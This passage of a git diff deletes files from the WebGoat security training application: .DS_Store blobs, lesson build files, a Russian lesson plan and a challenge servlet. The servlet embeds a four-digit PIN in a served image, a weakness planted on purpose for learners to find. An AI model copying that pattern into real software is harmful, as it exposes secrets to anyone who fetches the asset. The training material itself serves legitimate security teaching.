zw6fgdAb-~pa?&}j)%R<(QWFvR&XiKY=6y2fnU3v_7<rd$N-1|qz+)N57T;?$<5-2P
z?WUASMzb;nOY@9w%SxIL8Sa>8%z7*};W~M**Ke3ol!9yAZBRS2Xe6k$J7!XMteJx0
zceYpU+FiG|d4I>D3p=hWS0WX%JVAomo_W7%<cDXNs^glQF>Kwmr$&oRQp*^!wX6{d
zeGv}(Ue{Nv@}y3E4>&sW)0Gb-UQ=7Gs;5{@Z{DC-mn7d|PfV4ETs8$wG^}rs<)H^?
zT@_b!+PF_vhb=8_Sc)FzZY{US>S&QmqZ}872ij$IjD*k9q}>QMiQ>*KRlS#ud_r@*
zlR3ktS)Hfh4<ET>hgz-ntbCRAUs00AnOC>2(`@VFd-;Ng>*B3q=_ROv7CPdN!Xy}w
zgVXQ~JPXgkE3gD-;eGf7&cWyKC42>6!!rB~zre5X8~g!(BOs!T<ru*Vti&7eMy$hn
zY`_+5$6K)jJFy#&;c+~H12}>yOk)Oh%;LlN2tJAn_!K^mFXQXDh)eh$p2ZLGBR;3l
z3ZDI9j>6!llvssOyl@MRUJk-&U!~lCbs${c&e5yfStVHPzPO<4mT)agK0urhpPUsk
zd^j(`@d5!_v#VB)4ijL;?D{2NK|$Hd@nNm^#G+9}@`+*D`Uc8|2y4mjt8rgcR!V$$
zSuJrHRmyx!S(b>Dl~NyMmhJ4K+ATh>EPMC})dK(Vuza{7D%0-tZ%|u=cj03nvv1%#
z_z`}B-{DUJtc>8Q#u`E^io5Y9Y{Z+f37ZM7PP`3o$3xhM{e;+E1lbTFHiqLkL68|Z
zh0|za9z87L49?<Xcp4waC-6x^?ge}iU&2@MwRNx^T?gBlRoJplBB2+&48XT;8Q(Jn
zhFM47q$W4L+5TBf=55Qdr>OrG&@UZ2$X$5_O85{eyZ`rX{{H{UPb3&2P#{p?swse_
ziDaUOhTm)}W_RrvJ@?VW0&BOxt?xpSe;p_5U&qO^dxak;9b*ZyabXv@r4kDN`HKMd
SkC7eH!TBGY|2~1&X7mqKp#rV|

diff --git a/webgoat-lessons/auth-bypass/src/main/java/org/.DS_Store b/webgoat-lessons/auth-bypass/src/main/java/org/.DS_Store
deleted file mode 100644
index 8339472c99d019461c40bd63bbc20760ebcabff9..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0U1%It6vxlmB<<|9HM2=$CXL&!B*CU8G25ml(Y9{BOlun&+<Z5>&hCuK;Oxw@
zGrJp&(MZ8BMDYUzLBT|=DE3KFd=Pvo74ZwIm<N3kM12x`5(GW>&TQFint~Lx(7DUp
zb3e|xbN7FLduQ(e0QTq9D1ZzA0$t2X+bFw4V*TvekOE!{>qLqN$RrDPCTUp74ZePZ
zuYj+BuYj+BuYj+>)u8}Avsn^0dG5Qte(o#aD{xIJ!1jj-UChQjyX;!Nbx_8S0Awqv
znI|gKIe^DRJR9@uvTJ!Ljp?2q&<jQHh=Fc6^+%XH*_daSUF(Jey5WG{ozXj?Aiq1s
zMYua)%(Z^*E8r`zQ33X|sR9cMpn$#Z{Qg%mW9YWi*|~;+ipr`jTZN#wjeVq$cu#!Z
zD#RVd$=Ur%_7tz_s+RQ1qlz<MERR{1aj~o<Cv>flkaiAOrlaVlmMsaLozzX$D)d`9
zQ?+N~?s${B>dYsky3wqbr_fQw)FyOWPwIy5JSYU&Cm}U1F1AOzx_a9p(P+<7TVyeM
z;K2U2NcX|6r6uVHL1=6}*f%nrS$cY9^^G^*I`j6q^R5u+Z6;7#Cd_B+RWatG@syR$
zlz5eBX4v^r_nk+;Dr)w9iDvR(NW3#4)v)=W%s9Gb+7nvVCYz9|Z4&ZW$}+w0H<_}G
zT-vk~QYfVushpuWTAyLW^@lWj%Fz}aR+_P`tTVtJ6Oxp(wYxR))AQOOdD~Mu4aeLh
z48F6yZrARnz3uzE4_(-CU9}Xd5ycr2)^zmybuBwyVCqgQc1kl<-JF}uGieQN%v91^
zDDXuv$fK^Wm&I9?#vZX$7N<%d2yRbfy)2(%Jp);da#av`z@CUKj@fJqis#teB8p=V
z(E3WYH)!iVQ64vxq-IEJ&<*RjMU*G=t~Andukk>aC{L02X_~Yh!ZxqDr&pHmWp_TI
z*v`p}X40(A)9nu*xnqZ1FZUO}O8Hk5glQJlr>ZpDrr2J0NrO$XPH%AqXn+oS=p2Pv
z&>#b+;Td=qo`Y9l70$x@@ClrQ&*4k>3ciLl_!)kIU*R|S1O7%pL=meogf&=;H{gxf
zgw5E39oU7pVmJ0+A0ETwcmhXo0uz|T6snlUhw%}76qoTSd>&uM*Kq|`@jX0?AL2*u
zoB~Bmhf4sYB7REQdJw&rZ-L26ffydD6^H*H5ZAW5_|@*L^LXsLxTs~zSjrQJ$fbnS
zQ>23fx(>+;1Zl&rMln22kZB9$%U;Am+Ug?2y!S-HVM*ZBuxfJ)RRe^!z{hIc7Z#-o
z4lwH_Hp5aCN0n8HN>QrhFtch;FZFKW%(Cj?Bh(A-4~W%+En$&%s(*vq3cL#+bJV_p
z@8C!H34Vt^39>2ztR5Q(uQ2Y$o3Isc#x`sxz<TgDyd4kW5DpV&cM)h~gxM5M;|zhO
z;T+DRj#+dtj|E)7$M7^hj!)o|gxw4HBEE#L;%jBV9W4Xy%zEI`*5II;b5a1`+EsPj
zw*<$urCz2tGk>`~H6PEKhGovtm__*4PsOiYxdIjL5HdUe4{iSb|H^OVkKildD{$2+
zfR%&s!G4<FW?L;gYe(q1k1m#&-?D3Y2xa^@PL?0X$+B|=PgIVu0@;{nmt9LOl>YM<
V0sJo{dn)_SfB*T<5xgd|e*j!~4)Op1

diff --git a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/.DS_Store b/webgoat-lessons/auth-bypass/src/main/java/org/owasp/.DS_Store
deleted file mode 100644
index 2609cccd36d669cdf7efd8f2caf906bc80c36410..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI0TTC2P7{|YFfigR7WfqDI#ckIBu~a~A6{>ArZqnM45*JvY=sLSI!o=B`&CcvD
ziYTUuw-}9=#Kc4sL9Nl)CymAj6JMGd<1ML19`wb;s81$7nV9Hz&dfHjln`IMq;ocN
zzH|A$GiUziH#2(%0B|6ub^^!%Ake|Aw3D(cB-YQ4O)22Duui0S01Fgwk_9`HG&Xtr
z4ZZ@t0=@#i0=@#i0{;aC=$*}yu*G}d?e%kC0bhZuQUUgSh|s}o)U(U3<&O@^_!fX{
zIW_Y{W!eYun22Yio?Uh=52Z2P-2-}|=xs634X6GHb0-`1?6Pa!a6mU4&^t4FI~3$+
zr??1r2aLMb&wT}a1vV?dZktLdfCfpJTfcv|lGO7@GGpkr)6ubpfwJ<79hE{*+{u1Y
zNW3dHZxv#W;^gcBC3}X~bX7}w<uS#XFP6tG%eY)tl9RetNJx7IEz?nSQ_HRkosH|J
zY83{ooT=KgF?YPUt~&Dxsdg-@<tcPbF||qE)|0xSJNFAg_De_&i;HcYUESTSk<Ol;
zrPjz|XLom3Yozy3&(f0gogg%{9O@sP&MZB-vijQVZ=8Gc!bMjM^d2ZsQzFhMo0T!<
zI%6p-omuBuqMc#q$C3uqE?^b4`*xjn@=!>;Jt0-I>o}cpbj!3SwX97xAywHV=!ukN
zde<3GSw=2x+6gI?QjAp2P#mq_Fk<=xnmy%c3l1yI*jCmV<c<kR%GuhT8u{sYZHT<>
zDV>I6ZW0FH+Eu%EU*mzcuHGY;c3)E^g{nnyh6FYp{a#(mP868R(~6zaOjS4M;&~>q
zp^ckLS_=g}3kG@AwRN&MtJ2t`mdfH(={>>iX{eLsGpuJYt5L2B0uR_9k;QSFO+oP-
zo0>&&{61P|$@T_qIVj2#hLY3_Ne#MT?Kg>XJnu>)o%9;JdqjDP79dTNwnNzJHTNBs
z<-6ILPbs!@I-{91tBZ8{qsMOBE!W8d#Y-u@L_wHlQT?h)vu%tXaF;dM813*DSb%zH
zrx(z1n57#e183nWcp9F8mtYmn!@KYiT!2sEbNB+jgf;jPeuAIj7x)eSL_kClt1yJs
zScBK$_1K6_*o^JigEwO@_F+Gsz>|0iM{yDpn8XySn8pY3A$%B@@d<nuU&L2&1y}JM
zJdf|=2kx8#MO;VLK}bdXn6k|<(uX(>WBf`mhKFm!k$(rqwOuZPHG673Ci^chY{^ot
zXNrU5lEMip62c+ffaN6uwSI4d7@i=|w1v{8FCrmTx)?F<{gH535;!@m+SE+d0O2k0
zv04s>MX8KK%zBB>uvEcuWmO_ml*&2KtlD>&dUtScS@q~K>IL^EV)bBiSfr=c-$8B#
z-i8l3ZePJS@ICwhzrybXS_MH?hxLS5828}~*n&4=E4C42eRvDribrr5M+mh$2)1!T
zZ3?GxhG5fh4(CzFEIOFS0xsYqcorYU$MA7N?>T%PU%;2~l@jQVmq2%JGjwTdXh_XD
zDS)r-iZJ&t!7^>B+jwN=w|ma!V_DO%%sCprctdQQnqS*qfil-cX8Zr)t-t?oKalU?
zE8r{ezf}OshhjqmH2tj}r2*=T&~XnPEHS@j*YXg`m<wy?+i|jNU%?ZVBdkC+>e*%2
YQVXSj{6oNof4Bbo-+%ve46nNEFVWu}lmGw#

diff --git a/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/.DS_Store b/webgoat-lessons/auth-bypass/src/main/java/org/owasp/webgoat/.DS_Store
deleted file mode 100644
index 3efe5f71232d664d8ac3a94aab516092ac613b82..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeHLU1%It6h3G3)7fcjW|PKD8n<0Zf=x|g{%TTf>*mk2wxPjIvPl|UXLrVAaCT<d
znca=XXr$mDqWA-XpkSg_6#JwoJ_x>)iuear%!9rNqCN>e34)$`XSO7prXU3^bnbHR
zx%ZxP?!EKfZ|>bQ0DuEIwG%)F0D&@-(sn8?k(i$4O)22@FeQ>dfDUG|U}utsmE2_Q
zclZeS2>1y22>1y22wV*a(4Ebau*JRaYW>njz(?SkM1Y+S5z0(PJ-O^kesoa5LjaQH
z)XfvsDGuO15l==vx$H{rN@Kdw1A4CLg&63%lRm=CNk%=n>`K=i&~*p&W=1bUK|VYA
zMYuU&)RlheBj6*j83Fd%R6+&}$iZAm{Qg%mW9YWi(Xobsvhs?`Z9-7o&VEuzyeBqq
z6=II!<m>?@dy2PoRZDvHF~ylL*2gW&xL8+`le$(&NV^6t(@}I&%dT^sjq9dr6$Y%F
zsoJwKcf7c+I`avsb}Xyq$#qOIwMpI9le(ch4+=r{OGpiii*21<-QBH`&Yqs7*2rRK
zcXwB7r1wD2(vtLpAT+cb=pUWVEIqxl`o^1Yoq7A*c^3-wjuWUUf#$PPT#UKSSjtLg
z*4b^q&9L)h?st!XRmAQ4b-2kxA@R<HRL!2@WX91g)1K6_HpzrkWfPdkQkLmGV?1RU
zxwL5~q)<vRQaM9$w0^^g=?`i4l%p*;tTtm?S!a+NCL}3mYj<m8r{}dHvbLvm8jhJs
z7<^|(?e0B|``WsC4_(-KU6mB77R4C?*L3vzbuBwlU<gkuc1kl<-JFZ(8N7xzZYpUl
z6!;<-<X+d;$>OX^V~<)Y^HZe{1Xt5gC(EapW-zN!sR{yj*c*|>ahokc@eG@qMREKA
z+GEM~25s3d$`gi?)C@@tx^C^ah;lsdLL(jbI=g#Bd5Yjq)1vJVwtC%t2W9zQHuDL^
zc1~tAlU8+}raye-j-7IyJWza;(nl18Y39|hs<hh1=stH-gN@M+Z+iu(hjzMpj>0Tx
z^m?3zXW&_Q4qky(I1BH?CvXlvhcDqP_!`#WXZQtvh2P*0_!|KcMXbUQR$~p`fHz_z
zHeoZiV-Mbnz1WBScnpu@2^_^qOkfgIsA3u)#z*i`T*jyHd3+gP#}!<~_wX!!h#$FY
z3KXe2vW|jO#ZRdyrK0x<E)c&I6~n_d;>iC)#kCzS0c&>EdW`J9xUD4{xt>v+MlMe{
ze~SFz6x~3|3q;fU-3?-Rf@r2Klx}>H5Yjf6M9g|`Bpj9m&KuTjYNlp@$Sv@(TK0!U
zsf<&YX^EX-se+T0HHnv^RL<$lntcaJTgh3=num{&7Ti~ewS&!Jk<P1sL%0=q7e3}>
z`v$&)AK@qX9sVSmRS?DMu$~AO#yxlww&2a!ifu%(KD-TY$3r-bBSf^jh-%|Rv?-j%
z8KRnob2yJWX3@bs7H|O{!_)XUK7mgX@m|0e@g;l}Un`;9(Gtp?DWzQ68X8h_P72^#
zyCTA^H&8Ndsh8Df<}ZJ`=3`mYu*^9cx%e9JN&Mmp5GZqfWfuPrZ~guM3TE(KeFS_2
zu66{ld?+?FK&#y9Xl1c>gz|lqSz>m}uH-IM@Nk?Y564NexPm9DM_7eq)RW7uq#jED
U`G)}h-`2nX{rjKO@0u<C0YK&!dH?_b

diff --git a/webgoat-lessons/auth-bypass/src/main/resources/.DS_Store b/webgoat-lessons/auth-bypass/src/main/resources/.DS_Store
deleted file mode 100644
index 6efa04a20a9e4d079ccb94bd03cc4336d7391b9f..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeH~y-veW426#&LY2C7WW2A?jq$1~PrwWCQv^sU9a{EmeQl0?jTDHGIx)~=$@e6_
zcCPXbaSXs#ADbnx05GGw;^@oNeBXUy7a6&vnm=Q+f9fB1yPh|vn%8!C#Q|IN<N6M7
zSmFln<KPv8TRh+e&)APQPCZU}A|L`HAOa$A_5`v`&*o=OLI6ZS1b!0m??a)x*3_YC
zd^)(q2te%^4&!yq64c@WYE2!QGD5RfN^PZ<BZjqd#!Kea)S+oBhvo2Ld9vk%VsSd3
zUm_h=n`#vS5%^BPXK&iV`~NNdm-*jwWFjB}|CE4r>$~-eFPFV_@|xaj3;mw{Wz3Cq
mF42mq(TaKFt@wJBSNxj$HFanj<%~x;RX+mGMJ57&LEsaswH=rM

diff --git a/webgoat-lessons/auth-bypass/src/main/resources/html/.DS_Store b/webgoat-lessons/auth-bypass/src/main/resources/html/.DS_Store
deleted file mode 100644
index 5008ddfcf53c02e82d7eee2e57c38e5672ef89f6..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeH~Jr2S!425mzP>H1@V-^m;4Wg<&0T*E43hX&L&p$$qDprKhvt+--jT7}7np#A3
zem<@ulZcFPQ@L2!n>{z**<q8>++&mCkOWA81W14cNZ<zv;LbK1Poaz?KmsK2CSc!(
z0ynLxE!0092;Krf2c+FF_Fe*7ECH>lEfg7;MkzE(HCqgga^y>{tEnwC%0;vJ&^%eQ
zLs35+`xjp>T0<F0fCPF1$Cyrb|F7^5{eNG?83~ZUUlGt@xh*qZDeu<Z%US-OSsOPv
j)R!Z4KLME7ReXlK;d!wEw5GODWMKRea10D2@KpjYNUI8I

diff --git a/webgoat-lessons/bypass-restrictions/pom.xml b/webgoat-lessons/bypass-restrictions/pom.xml
deleted file mode 100755
index cd0ec4cdd..000000000
--- a/webgoat-lessons/bypass-restrictions/pom.xml
+++ /dev/null
@@ -1,11 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>bypass-restrictions</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-</project>
diff --git a/webgoat-lessons/challenge/pom.xml b/webgoat-lessons/challenge/pom.xml
deleted file mode 100644
index dc788907d..000000000
--- a/webgoat-lessons/challenge/pom.xml
+++ /dev/null
@@ -1,31 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>challenge</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-
-    <dependencies>
-        <dependency>
-            <groupId>io.jsonwebtoken</groupId>
-            <artifactId>jjwt</artifactId>
-            <version>0.9.1</version>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.boot</groupId>
-            <artifactId>spring-boot-starter-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-        <dependency>
-            <groupId>org.springframework.security</groupId>
-            <artifactId>spring-security-test</artifactId>
-            <scope>test</scope>
-        </dependency>
-
-    </dependencies>
-</project>
diff --git a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/ImageServlet.java b/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/ImageServlet.java
deleted file mode 100644
index 593c51047..000000000
--- a/webgoat-lessons/challenge/src/main/java/org/owasp/webgoat/challenges/challenge1/ImageServlet.java
+++ /dev/null
@@ -1,43 +0,0 @@
-package org.owasp.webgoat.challenges.challenge1;
-
-import org.springframework.core.io.ClassPathResource;
-import org.springframework.http.MediaType;
-import org.springframework.util.FileCopyUtils;
-
-import javax.servlet.ServletException;
-import javax.servlet.annotation.WebServlet;
-import javax.servlet.http.HttpServlet;
-import javax.servlet.http.HttpServletRequest;
-import javax.servlet.http.HttpServletResponse;
-import java.io.IOException;
-import java.security.SecureRandom;
-
-@WebServlet(name = "ImageServlet", urlPatterns = "/challenge/logo")
-public class ImageServlet extends HttpServlet {
-	
-	private static final long serialVersionUID = 9132775506936676850L;
-	static final public int PINCODE = new SecureRandom().nextInt(10000);
-
-	@Override
-	protected void doGet(HttpServletRequest request, HttpServletResponse response)
-			throws ServletException, IOException {
-		
-		byte[] in = new ClassPathResource("images/webgoat2.png").getInputStream().readAllBytes();
-		
-		String pincode = String.format("%04d", PINCODE);
-		
-		in[81216]=(byte) pincode.charAt(0);
-		in[81217]=(byte) pincode.charAt(1);
-		in[81218]=(byte) pincode.charAt(2);
-		in[81219]=(byte) pincode.charAt(3);
-		
-	    response.setContentType(MediaType.IMAGE_PNG_VALUE);
-	    FileCopyUtils.copy(in, response.getOutputStream());
-	}
-
-	@Override
-	protected void doPost(HttpServletRequest request, HttpServletResponse response)
-			throws ServletException, IOException {
-		doGet(request, response);
-	}
-}
\ No newline at end of file
diff --git a/webgoat-lessons/challenge/src/main/resources/html/Challenge.html b/webgoat-lessons/challenge/src/main/resources/html/Challenge.html
deleted file mode 100644
index 7771134ab..000000000
--- a/webgoat-lessons/challenge/src/main/resources/html/Challenge.html
+++ /dev/null
@@ -1,9 +0,0 @@
-    <!DOCTYPE html>
-
-<html xmlns:th="http://www.thymeleaf.org">
-
-<div class="lesson-page-wrapper">
-    <div class="adoc-content" th:replace="doc:Challenge_introduction.adoc"></div>
-</div>
-
-</html>
\ No newline at end of file
diff --git a/webgoat-lessons/chrome-dev-tools/pom.xml b/webgoat-lessons/chrome-dev-tools/pom.xml
deleted file mode 100644
index fdb4e9726..000000000
--- a/webgoat-lessons/chrome-dev-tools/pom.xml
+++ /dev/null
@@ -1,11 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>chrome-dev-tools</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/cia/pom.xml b/webgoat-lessons/cia/pom.xml
deleted file mode 100644
index 68f02549f..000000000
--- a/webgoat-lessons/cia/pom.xml
+++ /dev/null
@@ -1,11 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>cia</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/client-side-filtering/pom.xml b/webgoat-lessons/client-side-filtering/pom.xml
deleted file mode 100644
index 78bb41d25..000000000
--- a/webgoat-lessons/client-side-filtering/pom.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>client-side-filtering</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-</project>
diff --git a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/ru/ClientSideFiltering.html b/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/ru/ClientSideFiltering.html
deleted file mode 100644
index 301231591..000000000
--- a/webgoat-lessons/client-side-filtering/src/main/resources/lessonPlans/ru/ClientSideFiltering.html
+++ /dev/null
@@ -1,11 +0,0 @@
-<div align="Center">
-<p><b>Название урока: </b>Фильтрация данных на стороне клиента</p>
-</div>
-<p><b>Тема для изучения:</b> </p>
-<!-- Start Instructions -->
-Всегда считается хорошей практикой отправлять на сторону клиента только ту информацию, доступ к которой он имеет.
-В данном уроке на сторону клиента будет отправлено очень много информации, что создаст серьёзные проблемы с контролем доступа к ней.
-<!-- Stop Instructions -->
-<p><b>Основные цели и задачи:</b> </p>
-Ваша цель состоит в том, чтоб среди принимаемых со стороны сервера данных найти ту
-информацию, доступа к которой у вас нет.
diff --git a/webgoat-lessons/cross-site-scripting/.gitignore b/webgoat-lessons/cross-site-scripting/.gitignore
deleted file mode 100644
index b83d22266..000000000
--- a/webgoat-lessons/cross-site-scripting/.gitignore
+++ /dev/null
@@ -1 +0,0 @@
-/target/
diff --git a/webgoat-lessons/cross-site-scripting/.sonatype b/webgoat-lessons/cross-site-scripting/.sonatype
deleted file mode 100644
index 12d612a2b..000000000
--- a/webgoat-lessons/cross-site-scripting/.sonatype
+++ /dev/null
@@ -1,3 +0,0 @@
-#Sonatype CLM
-#Tue Oct 11 14:10:26 EDT 2016
-application.id=webgoat
diff --git a/webgoat-lessons/cross-site-scripting/pom.xml b/webgoat-lessons/cross-site-scripting/pom.xml
deleted file mode 100644
index 9bb6163e1..000000000
--- a/webgoat-lessons/cross-site-scripting/pom.xml
+++ /dev/null
@@ -1,19 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>cross-site-scripting</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-    <dependencies>
-        <dependency>
-            <!-- jsoup HTML parser library @ https://jsoup.org/ -->
-            <groupId>org.jsoup</groupId>
-            <artifactId>jsoup</artifactId>
-            <version>1.14.2</version>
-        </dependency>
-    </dependencies>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/crypto/pom.xml b/webgoat-lessons/crypto/pom.xml
deleted file mode 100644
index 87c6cd064..000000000
--- a/webgoat-lessons/crypto/pom.xml
+++ /dev/null
@@ -1,12 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>crypto</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-
-</project>
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonSolutions/en/crypto_solution.adoc b/webgoat-lessons/crypto/src/main/resources/lessonSolutions/en/crypto_solution.adoc
deleted file mode 100644
index b883bfe0f..000000000
--- a/webgoat-lessons/crypto/src/main/resources/lessonSolutions/en/crypto_solution.adoc
+++ /dev/null
@@ -1,5 +0,0 @@
-= Crypto Basics 
- 
-== Solution 
-
-Solution goes here
\ No newline at end of file
diff --git a/webgoat-lessons/crypto/src/main/resources/lessonSolutions/html/crypto.html b/webgoat-lessons/crypto/src/main/resources/lessonSolutions/html/crypto.html
deleted file mode 100644
index 30f16f080..000000000
--- a/webgoat-lessons/crypto/src/main/resources/lessonSolutions/html/crypto.html
+++ /dev/null
@@ -1,14 +0,0 @@
-<!DOCTYPE html>
-
-<html xmlns:th="http://www.thymeleaf.org">
-
-
-
-	<div class="lesson-page-wrapper">
-		<!-- reuse this block for each 'page' of content -->
-		<!-- include content here ... will be first page/tab  multiple -->
-		<div class="adoc-content" th:replace="doc:crypto_solution.adoc"></div>
-	</div>
-
-
-</html>
\ No newline at end of file
diff --git a/webgoat-lessons/csrf/pom.xml b/webgoat-lessons/csrf/pom.xml
deleted file mode 100644
index cf0cd930d..000000000
--- a/webgoat-lessons/csrf/pom.xml
+++ /dev/null
@@ -1,11 +0,0 @@
-<project xmlns="http://maven.apache.org/POM/4.0.0" xmlns:xsi="http://www.w3.org/2001/XMLSchema-instance"
-         xsi:schemaLocation="http://maven.apache.org/POM/4.0.0 http://maven.apache.org/maven-v4_0_0.xsd">
-    <modelVersion>4.0.0</modelVersion>
-    <artifactId>csrf</artifactId>
-    <packaging>jar</packaging>
-    <parent>
-        <groupId>org.owasp.webgoat.lesson</groupId>
-        <artifactId>webgoat-lessons-parent</artifactId>
-        <version>8.2.3-SNAPSHOT</version>
-    </parent>
-</project>
\ No newline at end of file
diff --git a/webgoat-lessons/csrf/src/.DS_Store b/webgoat-lessons/csrf/src/.DS_Store
deleted file mode 100644
index 24317c3182ed781e71343464b283e3c5f25d9fe0..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 6148
zcmeHKL2KJE6qb^7bJ~l?S_t%_Yaxe})(g9NX?H9HJQ7MXG8>yk;MpN|8b%2C+@G<v
z-Tp^u|HBUbA-(lINeL<0jvLK*&pdrkPwz?ACnH&mG2R-7`;6I)F$)y2RE6R<g6*g)
zQZgPyj(r4^Y#7980QHBJXmUJ925{{v><jamWXbaS1;bcod86@*m&%om7cZ^q<`zEo
ztIdzzAf0%*pO3SaKRQ!28AgGz+kQTn+aJ<2Uf6!nk<p}YZy%*e?#m<^Ev5FlG6~a3
zD;+0c*7J0KT^Z(szP-~PMdy&(_LHb1Ga1NO=3lKUK7G43ojPxwx^NDhSzSz<%|=}u
z9=w^&?0d`F-E-cZoDOFf-@ad7UH|xbbE{W@!w0M6wZS>ufw3Uu+#4lvntTS|JboTW
zNDL4I#K0OeV74@CYmMhXuTBgQ1Am7B+#dueqHD0wsJ0F$@b?khD~Kpy<6Qz#7<3I5
z8leS*>r_CU%FPvn>vZr76XzN%H0pH5)yU9~8JU|K3Rk0pU#M`#U5!){1H`~n2Fki>
z<N5#o&-eeQNmL^Sh=Ko#0bV)wj$1G#bGEKb4$oQv`Uw;T;|h(76fo3L46%3=*Fcqk
YU!Vc#8Z0z|2ZVkE6b)1m1OJqPN3gMEGynhq

diff --git a/webgoat-lessons/csrf/src/main/.DS_Store b/webgoat-lessons/csrf/src/main/.DS_Store
deleted file mode 100644
index e2fe0824e83f3df0fdf6516e4ad84e4ff1a229c8..0000000000000000000000000000000000000000
GIT binary patch
literal 0
HcmV?d00001

literal 8196
zcmeI1T}&KR6vxk5pq-tzG7Ck9;<jsmSn3v`ut2q~%a^paq{QXB=sLSI!sswVc4ik8
z(KSu18l&+eF)`6ZP-`^yNu%+>#HiK8#E+yg@}Ms!Mtw5zNnh%@cV-D);K2t))47|u
z=YE}g@BZ&^=I)&Z0PN1HEdVkA2y`(k?VxCb!0OqxE(E-iZDf)BAvI^urVJ}Z`9IdR
z_6vLkd<A?3d<A?3d<Fgs3ecX-g0RWH@7DUUuYj+>RjB}bK1AqZHtyNHYx$#tB7OuQ
zTS~<|P+DRMvJub5J)3te)lfj!m8|QE-Vp;`cPfu~?c$!zyVi9F^bQ~Bjf~z21^MXI
ze}p#&jJwv4eFc04)+@ly?xk=qD3AkX?fE@5Yv{Jq+`NK;lG3tm+l8RGgMFlscxPhT
znoBr}leN2*%o(23RW0SE2Nh?!kRGxuV>PX$Ms#g1DedmDOh?g8EwjdTa#S}}Yp&bM
znyNjSaQhq8RcAUWRSjme9JvlErZ%G6dP+BR=YAo`K1oSlScrARqLElEwit~pbaXUF
zBW<nii;L3tf>7HS>lzrJU3_9``PJ86KmW$ZpSl{L_Z)%BB26x?6(pC)n1*FeQ5kC=
zgbZk4g9TYirCEB7WPkpDB&#9G+S;R$mR2rV%b`}v#9CW6*6b6e3588H`;00#(8jQH
